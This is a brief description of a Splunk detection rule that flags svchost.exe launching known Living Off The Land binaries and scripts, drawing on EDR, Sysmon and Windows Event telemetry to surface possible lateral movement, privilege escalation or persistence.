This detection rule targets the spawning of Living Off The Land Binaries and Scripts (LOLBAS) processes by 'svchost.exe'. It utilizes data from Endpoint Detection and Response (EDR) systems to monitor instances where 'svchost.exe' creates child processes that correspond to known LOLBAS executables. The significance of this detection lies in the fact that attackers often exploit LOLBAS to run malicious code covertly, which can allow for lateral movement, privilege escalation, or persistent access within an environment. Consequently, identifying such behaviors could indicate potential security threats that warrant investigation. The rule is created on Splunk and utilizes relevant telemetry including Sysmon and Windows Event logs to provide comprehensive coverage and insights into potential malicious activities associated with 'svchost.exe'.